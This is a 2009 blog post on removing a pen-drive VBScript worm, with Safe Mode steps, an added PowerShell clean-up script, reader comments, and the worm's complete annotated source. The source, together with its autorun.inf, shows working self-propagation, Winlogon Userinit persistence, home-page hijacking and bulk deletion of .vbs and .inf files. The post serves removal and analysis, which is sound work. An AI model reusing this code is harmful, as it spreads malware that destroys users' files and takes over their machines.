Saturday, January 3, 2009

Easy Removal of RAHUL THE H@CkEr worm

A new worm seems to have made its way onto my system via a pen drive. It changed my home page to a rogue site, "http://WWW.RAHULHACKINGARTICLE.WETPAINT.COM", and replaced "Microsoft Internet Explorer" in the title bar with "RAHUL THE H@CkEr". The only harm that is visible from the desktop is the home page being permanently changed to the rogue link, but the source code (listed further down) shows it does more than that: it hooks the Winlogon Userinit value so that wscript.exe starts it again at every logon, copies itself together with an autorun.inf onto every pen drive it sees, and deletes every .vbs file in the Windows directory and in the root of each drive.

The surprise I found while going through the source code is that this worm actually deletes a few other common pen-drive threats: any autorun* file and any .vbs file in the drive root, .inf files in the root of fixed drives, killvbs.vbs and virusremoval.vbs in system32, and winfile.exe and run.wsh on the drive. (It also tries to delete ravmon.exe and sxs.exe, but those two statements use an undeclared object name, Fso instead of FOBJ, so under On Error Resume Next they never run.) So perhaps Rahul the Hacker's intention was good? But then why set the home page permanently to a rogue link?
My antivirus was out of date and could not remove it.
  • To remove the worm easily, log into Windows in Safe Mode. You get to Safe Mode by pressing F8 repeatedly while Windows 98 or XP boots.
  • Once in Safe Mode, open Task Manager by pressing Ctrl+Alt+Delete.
  • Select Wscript.exe and click End Task.
  • Search for and delete every file named "LOVERAHULSAS". There is one copy in the system32 folder and one in the root of every pen drive the worm has touched; the copies on pen drives are written with the hidden and system attributes set, so enable showing hidden and protected system files in Folder Options before searching.
  • After deleting the script files, make sure the source pen drive is formatted. Restart in normal mode.
    After these steps you can set the home page back to anything you want.
    The remaining traces can be removed with HijackThis v2: fix the entry containing "RAHUL THE H@CkEr" (the Internet Explorer window title) and the Winlogon Userinit entry that tells wscript.exe to run LOVERAHULSAS.vbs at every logon. Do not skip the Userinit entry: once the script file is gone, Windows will otherwise complain at every boot that it cannot find C:\WINDOWS\system32\LOVERAHULSAS.vbs.
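    The same clean-up done in one go, as an added example that is not part of the original post and not the worm author's code. It reverses exactly the changes visible in the worm's source further down: it stops wscript.exe, deletes the dropped copies and any autorun.inf that references the worm from every drive, and resets the Winlogon Userinit value that the manual steps leave behind. It assumes an elevated PowerShell prompt, default install paths under $env:SystemRoot, and that the clean Userinit value is "<system32>\userinit.exe," (check that against a known-good machine first); the AutoRun policy at the end is an extra hardening step that the post does not mention.

```powershell
# Added example, not from the original post and not the worm's code: undo the
# changes LOVERAHULSAS.vbs makes, in the order of the manual steps above.
# Run from an elevated PowerShell prompt (Safe Mode is fine). Assumptions:
# default install paths under $env:SystemRoot, and a clean Userinit value of
# "<system32>\userinit.exe," (verify against a known-good machine first).
$ErrorActionPreference = 'Continue'
$sys      = Join-Path $env:SystemRoot 'system32'
$wormName = 'LOVERAHULSAS.vbs'

# 1. Stop the script host first: the copy started via Userinit loops forever
#    and would re-create anything deleted while it is still running.
Get-Process -Name wscript, cscript -ErrorAction SilentlyContinue | Stop-Process -Force

# 2. The worm sets the hidden/system/read-only attributes on what it drops,
#    so clear them before deleting.
function Remove-WormFile {
    param([string]$Path)
    if (Test-Path -LiteralPath $Path -ErrorAction SilentlyContinue) {
        $item = Get-Item -LiteralPath $Path -Force
        $item.Attributes = 'Normal'
        Remove-Item -LiteralPath $Path -Force
        Write-Host "removed $Path"
    }
}

# 3. Copies live in system32 and in the root of every drive the worm reached.
Remove-WormFile (Join-Path $sys $wormName)
foreach ($drive in Get-PSDrive -PSProvider FileSystem) {
    $root = $drive.Root
    Remove-WormFile (Join-Path $root $wormName)
    # Only remove an autorun.inf that actually launches the worm; a legitimate
    # autorun.inf (e.g. on a software CD) is left alone.
    $inf = Join-Path $root 'autorun.inf'
    if (Test-Path -LiteralPath $inf -ErrorAction SilentlyContinue) {
        $text = [IO.File]::ReadAllText($inf)
        if ($text -match 'LOVERAHULSAS') { Remove-WormFile $inf }
    }
}

# 4. Registry. Userinit is the entry the manual steps miss: with the file gone
#    and the value still present, every logon reports that the script cannot
#    be found.
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$ieMain   = 'HKCU:\Software\Microsoft\Internet Explorer\Main'
$cleanUserinit = "$sys\userinit.exe,"   # assumed default value, trailing comma included

$current = (Get-ItemProperty -Path $winlogon -Name Userinit).Userinit
if ($current -match 'LOVERAHULSAS') {
    Set-ItemProperty -Path $winlogon -Name Userinit -Value $cleanUserinit
    Write-Host "Userinit reset from '$current' to '$cleanUserinit'"
}
# The worm also writes Shell=explorer.exe, which is the normal value, so that
# one needs no change.
Remove-ItemProperty -Path $ieMain -Name 'Window Title' -ErrorAction SilentlyContinue
Set-ItemProperty    -Path $ieMain -Name 'Start Page'   -Value 'about:blank'

# 5. Hardening not in the post: disable AutoRun for all drive types (0xFF) so
#    the next infected pen drive cannot start wscript.exe on insertion.
$explorerPol = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
if (-not (Test-Path $explorerPol)) { New-Item -Path $explorerPol | Out-Null }
New-ItemProperty -Path $explorerPol -Name NoDriveTypeAutoRun -PropertyType DWord -Value 0xFF -Force | Out-Null
```

    The AutoRun policy only covers the insertion path. The shell\open\Command line in the worm's autorun.inf targets the double-click on the drive in Explorer, which is why the loop in step 3 still has to remove the inf from every pen drive that has been plugged into an infected machine.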
    I recovered the entire source code of the worm after removing it; it is given below, one statement per line, with the worm's own comments kept and a few notes added about what each part does.
    Source of LOVERAHULSAS.vbs

    'THIS IS AN ANTI VIRUS WHICH WILL WORK AS
    'A VIRUS AND WILL ONLY REPAIR YOUR WINDOWS
    'AND WONT DO ANY HARM
    '
    'HACK THE WORLD
    'RAHUL THE H@CkEr
    '@FB1-INNOVATIONS RULEZZZ
    'LOVERAHULSAS@GMAIL.COM
    'http://WWW.RAHULHACKINGARTICLE.WETPAINT.COM
    Option Explicit
    On Error Resume Next   ' any statement that fails is silently skipped

    Dim FOBJ,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg,folder,files,Delete,auto,root
    Dim alert
    Set FOBJ = CreateObject("Scripting.FileSystemObject")
    Set Shells = CreateObject("Wscript.Shell")
    Set WinDir = FOBJ.GetSpecialFolder(0)      ' C:\WINDOWS
    Set SystemDir = FOBJ.GetSpecialFolder(1)   ' C:\WINDOWS\system32
    Set File = FOBJ.GetFile(WScript.ScriptFullName)
    Set Drv = File.Drive
    Set InDrive = FOBJ.drives

    ' Read the script's own text into AllFile; this is the body copied to each drive
    Set ReadAll = File.OpenAsTextStream(1,-2)
    do while not ReadAll.atendofstream
        AllFile = AllFile & ReadAll.readline
        AllFile = AllFile & vbcrlf
    Loop

    ' DriveType of the drive the script was started from: 1 = removable, 2 = fixed.
    ' Started from a pen drive the main loop runs once; started from system32
    ' (via Userinit) it loops forever, re-infecting every drive once a second.
    Count=Drv.DriveType

    Do
        ' Drop a copy into system32 and show the fake "anti-virus" message box
        If Not FOBJ.FileExists(SystemDir & "\LOVERAHULSAS.vbs") then
            set WriteAll = FOBJ.CreateTextFile(SystemDir & "\LOVERAHULSAS.vbs",2,true)
            WriteAll.Write AllFile
            WriteAll.close
            ' "Fso" is undeclared (the object is called FOBJ), so this and the
            ' Attributes line fail silently and the system32 copy is never hidden
            set WriteAll = Fso.GetFile(SystemDir & "\LOVERAHULSAS.vbs")
            WriteAll.Attributes = -1
            alert =MsgBox("THIS IS AN ANTI-VIRUS AND WILL HELP YOUR SYSTEM TO WORK PROPERLY", 4096,"RAHUL THE H@CkEr")
        End If

        ' Registry: IE title bar and home page, re-enable Folder Options, Task
        ' Manager and regedit (other worms disable them), and hook Winlogon so
        ' wscript.exe runs the system32 copy at every logon
        Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","RAHUL THE H@CkeR"
        Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
        Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
        Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
        Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.rahulhackingarticle.wetpaint.com/"
        Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
        Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
            SystemDir & "\wscript.exe " & SystemDir & "\LOVERAHULSAS.VBS"

        For Each Drives In InDrive
            root = Drives.Path & "\"
            ' When started by autorun, open an Explorer window on the drive so the
            ' double-click appears to have done what the user expected
            If FOBJ.GetParentFolderName(WScript.ScriptFullName)=root Then
                Shells.Run "explorer.exe " & root
            End If
            Set folder=FOBJ.GetFolder(root)
            ' Remove two known removal scripts and every autorun* file in the drive root
            Set Delete = FOBJ.DeleteFile(SystemDir & "\killvbs.vbs",true)
            Set Delete = FOBJ.DeleteFile(SystemDir & "\virusremoval.vbs",true)
            For Each files In folder.Files
                auto=Left(files.Name,7)
                If UCase(auto)=UCase("autorun") Then
                    Set Delete = FOBJ.DeleteFile(root & files.Name,true)
                End If
            Next
            ' Fixed drives: delete every .inf in the root
            If Drives.DriveType=2 Then
                delext "inf",Drives.Path & "\"
                delext "INF",Drives.Path & "\"
            End if

            If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
                If Drives.Path<> "A:" Then
                    ' Delete every .vbs in C:\WINDOWS and in the drive root (competing script worms)
                    delext "vbs",WinDir & "\"
                    delext "vbs",Drives.Path & "\"
                    ' Known pen-drive malware; the first two use the undeclared "Fso" and never run
                    If FOBJ.FileExists(Drives.Path & "\ravmon.exe") Then
                        Fso.DeleteFile(Drives.Path & "\ravmon.exe")
                    End If
                    If FOBJ.FileExists(Drives.Path & "\sxs.exe") Then
                        Fso.DeleteFile(Drives.Path & "\sxs.exe")
                    End If
                    If FOBJ.FileExists(Drives.Path & "\winfile.exe") Then
                        FOBJ.DeleteFile(Drives.Path & "\winfile.exe")
                    End If
                    If FOBJ.FileExists(Drives.Path & "\run.wsh") Then
                        FOBJ.DeleteFile(Drives.Path & "\run.wsh")
                    End If
                    ' Removable drives only: drop a copy and an autorun.inf that launches it
                    If Drives.DriveType = 1 Then
                        If Drives.Path<>"A:" Then
                            If Not FOBJ.FileExists(Drives.Path & "\LOVERAHULSAS.vbs") Then
                                Set WriteAll=FOBJ.CreateTextFile(Drives.Path & "\LOVERAHULSAS.vbs",2,True)
                                WriteAll.Write AllFile
                                WriteAll.Close
                                Set WriteAll = FOBJ.GetFile(Drives.Path & "\LOVERAHULSAS.vbs")
                                WriteAll.Attributes = -1   ' intended to set every attribute bit (read-only, hidden, system, archive)
                            End If
                            If FOBJ.FileExists(Drives.Path & "\autorun.inf") Or FOBJ.FileExists(Drives.Path & "\AUTORUN.INF") Then
                                Set Chg = FOBJ.GetFile(Drives.Path & "\autorun.inf")
                                Chg.Attributes = -8   ' low three bits clear: drop read-only/hidden/system so it can be overwritten
                                Set WriteAll = FOBJ.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
                                WriteAll.writeline "[autorun]"
                                WriteAll.WriteLine "open=wscript.exe LOVERAHULSAS.vbs"
                                WriteAll.WriteLine "shell\open=Open"
                                WriteAll.WriteLine "shell\open\Command=wscript.exe LOVERAHULSAS.vbs"
                                WriteAll.Close
                                Set WriteAll = FOBJ.GetFile(Drives.Path & "\autorun.inf")
                                WriteAll.Attributes = -1
                            else
                                Set WriteAll = FOBJ.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
                                WriteAll.writeline "[autorun]"
                                WriteAll.WriteLine "open=wscript.exe LOVERAHULSAS.vbs"
                                WriteAll.WriteLine "shell\open=Open"
                                WriteAll.WriteLine "shell\open\Command=wscript.exe LOVERAHULSAS.vbs"
                                WriteAll.Close
                                Set WriteAll = FOBJ.GetFile(Drives.Path & "\autorun.inf")
                                WriteAll.Attributes = -1
                            End if
                        End If
                    End If
                End if
            End If
        Next
        ' Only the copy running from a fixed disk (system32) keeps looping
        if Count <> 1 then
            Wscript.sleep 1000
        end if
    loop while Count<>1

    ' Delete every file in SrchPath whose name ends in File2Find (compared case-insensitively),
    ' except VirusRemoval.vbs
    sub delext(File2Find, SrchPath)
        Dim oFileSys, oFolder, oFile,Cut,Delete
        Set oFileSys = CreateObject("Scripting.FileSystemObject")
        Set oFolder = oFileSys.GetFolder(SrchPath)
        For Each oFile In oFolder.Files
            Cut=Right(oFile.Name,3)
            If UCase(Cut)=UCase(file2find) Then
                If oFile.Name <> "VirusRemoval.vbs" Then
                    Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
                End If
            End If
        Next
    End sub
    Content of the autorun.inf written to every pen drive
    [autorun]
    open=wscript.exe LOVERAHULSAS.vbs
    shell\open=Open
    shell\open\Command=wscript.exe LOVERAHULSAS.vbs
    The open= line runs the script on insertion when AutoPlay is enabled; the shell\open\Command line replaces the "Open" action for the drive in Explorer, so simply double-clicking the pen drive starts the worm even where AutoPlay is off.

8 comments:

Vijay said...

could you please tell me the language used for writing this code.

Indra Teja said...

When I started in safe mode and pressed Ctrl+Alt+Del there's no Wscript.exe task running, and I searched my whole computer and there's no file with the name LOVERAHULSAS, and whenever I boot my computer I see a window "cannot find c:\windows\system32\LOVERAHULSAS.vbs". Please help me, how could I fix it?

Indra Teja said...

Please help me with this problem i really got fed up with this......

AG said...

@ Indra Teja
Just follow the steps after the step you tried. Use Hijack 2 to remove the entries. This will solve your problem.

Indra Teja said...

Yeah, please tell me how you use Hijack 2 and what is it?

Indra Teja said...

I cannot install anything, like my Winamp player is now not working, and I uninstalled it and again I tried to install it but I can't.

AG said...

@ Indra Tej,

First get and install a good antivirus and run a full system scan to remove all viruses. If you can't even install an antivirus, attach your hard disk to a system that has an antivirus installed and get it scanned.

For info about Hijack this-- you can read below link.
http://www.bleepingcomputer.com/tutorials/tutorial42.html

If you are not sure what you are doing, it might be better to contact a professional.